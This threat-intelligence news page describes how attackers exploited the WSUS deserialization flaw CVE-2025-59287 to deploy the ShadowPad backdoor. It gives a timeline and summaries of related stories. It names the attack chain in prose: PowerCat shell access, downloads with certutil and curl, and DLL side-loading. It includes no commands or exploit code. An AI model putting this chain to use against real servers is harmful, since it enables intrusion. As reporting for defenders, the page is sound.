ShadowPad Malware Deployed via Exploited WSUS CVE-2025-59287 Vulnerability
Threat actors have exploited a critical deserialization vulnerability in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, to gain remote code execution with system privileges and deploy the ShadowPad backdoor. The attackers targeted publicly exposed WSUS-enabled Windows Servers, using the PowerCat utility to obtain a system shell and then leveraging legitimate Windows tools such as curl.exe and certutil.exe to download and install ShadowPad from an external server. ShadowPad, a modular backdoor associated with Chinese state-sponsored groups, is loaded via DLL side-loading techniques, specifically using a legitimate binary to execute a malicious DLL payload in memory.
The vulnerability, which was patched by Microsoft in October, allows remote, unauthenticated attackers to trigger unsafe deserialization of AuthorizationCookie objects, leading to full system compromise. Security researchers from AhnLab and others have documented the attack chain, noting that the flaw has been added to CISA's Known Exploited Vulnerabilities catalog and that a public proof-of-concept exploit is available. The incident highlights the ongoing risk posed by unpatched WSUS servers and the sophisticated methods used by threat actors to maintain persistence and evade detection once ShadowPad is installed.
Timeline
Nov 25, 2025
Researchers attribute campaign to China-linked APT groups
Security reporting linked the ShadowPad deployment campaign to Chinese state-aligned threat actors, with references to groups such as APT41, APT10, and PLA-affiliated clusters. The activity was described as targeting sectors including manufacturing, telecom, and energy.
Nov 25, 2025
CISA adds CVE-2025-59287 to the KEV catalog
Following evidence of active exploitation, CISA added CVE-2025-59287 to its Known Exploited Vulnerabilities catalog and pushed for urgent remediation. Subsequent reporting also described mandated or strongly urged patching and access restrictions for affected organizations.
Nov 24, 2025
AhnLab documents active ShadowPad intrusions via WSUS
AhnLab Security Intelligence Center reported observing the WSUS exploitation chain in the wild, detailing the use of legitimate Windows binaries and the delivery of ShadowPad. Its findings provided technical confirmation of ongoing attacks against publicly exposed WSUS instances.
Nov 24, 2025
Threat actors exploit WSUS flaw to deploy ShadowPad
Attackers actively exploited CVE-2025-59287 to gain SYSTEM-level access on WSUS servers, using PowerCat for shell access and certutil and curl to download ShadowPad. The malware was deployed via DLL sideloading and used persistence and anti-detection techniques, with some intrusions also involving reconnaissance and tools such as Velociraptor.
Oct 1, 2025
Public PoC exploit for CVE-2025-59287 triggers rapid weaponization
After proof-of-concept exploit code for CVE-2025-59287 was publicly released, attackers quickly began weaponizing the flaw against exposed WSUS servers. Reports describe this publication as the catalyst for active exploitation.
Oct 1, 2025
Microsoft patches critical WSUS RCE flaw CVE-2025-59287
Microsoft released an out-of-band patch for CVE-2025-59287, a critical unsafe deserialization flaw in the WSUS GetCookie() endpoint that can allow unauthenticated remote code execution as SYSTEM. Multiple reports place the patch release in October 2025.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Vulnerabilities
Threat Actors
Malware
Sources
Related Stories
Remote Code Execution Vulnerabilities in Microsoft Update Services Exploited
A critical remote code execution (RCE) vulnerability was discovered in Microsoft's Update Health Tools (KB4023057), a utility designed to facilitate rapid security updates via Intune. Researchers found that a misconfiguration involving abandoned Azure blob storage allowed attackers to register a storage account and receive requests from vulnerable devices worldwide, enabling arbitrary code execution. Microsoft has since responded to the disclosure, and newer versions of the tool have addressed the issue, but devices running the original version remain at risk if not updated. Separately, a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, was actively exploited by threat actors to deploy the ShadowPad backdoor malware. Attackers leveraged this flaw to gain system-level access using PowerCat and subsequently installed ShadowPad via `certutil` and `curl`. The exploitation of these vulnerabilities highlights the risks associated with update management tools and the importance of timely patching and secure configuration to prevent compromise by advanced persistent threats.
1 months ago
Microsoft WSUS Remote Code Execution Vulnerability Actively Exploited
Microsoft released an urgent out-of-band security update to address a critical remote code execution vulnerability in Windows Server Update Services (WSUS), identified as CVE-2025-59287. The flaw was reportedly under active exploitation in the wild, prompting Microsoft to issue a comprehensive fix outside of its regular update cycle. Security advisories and industry news highlighted the severity of the vulnerability and its inclusion in the U.S. CISA Known Exploited Vulnerabilities catalog, underscoring the immediate risk to organizations relying on WSUS for patch management. The vulnerability allowed attackers to potentially execute arbitrary code on affected WSUS servers, posing a significant threat to enterprise environments. Security experts urged organizations to apply the patch without delay to mitigate the risk of compromise. The rapid response from Microsoft and the attention from security agencies reflect the critical nature of the flaw and the ongoing threat landscape targeting core infrastructure components like WSUS.
1 months ago
Critical RCE Vulnerability in Microsoft WSUS via Unsafe Cookie Deserialization
Microsoft has released emergency out-of-band security updates to address a critical remote code execution (RCE) vulnerability in Windows Server Update Services (WSUS), tracked as CVE-2025-59287. The flaw, rated CVSS 9.8, allows unauthenticated attackers to exploit unsafe deserialization in the WSUS AuthorizationCookie mechanism, enabling arbitrary code execution with SYSTEM privileges. Proof-of-concept exploit code for this vulnerability is publicly available, increasing the urgency for organizations to patch affected systems immediately. The vulnerability affects only Windows servers with the WSUS Server Role enabled, and Microsoft has provided security updates for all supported Windows Server versions, along with workarounds for those unable to patch immediately. Security researcher Batuhan Er from HawkTrace detailed that the vulnerability arises from the unsafe deserialization of AuthorizationCookie objects sent to the `GetCookie()` endpoint, where encrypted cookie data is decrypted and deserialized without proper type validation. This flaw exposes WSUS servers to remote, unauthenticated attacks that require no user interaction and could potentially be wormable between WSUS servers. Microsoft strongly advises administrators to install the provided patches or apply recommended mitigations to prevent exploitation of this critical vulnerability.
1 months ago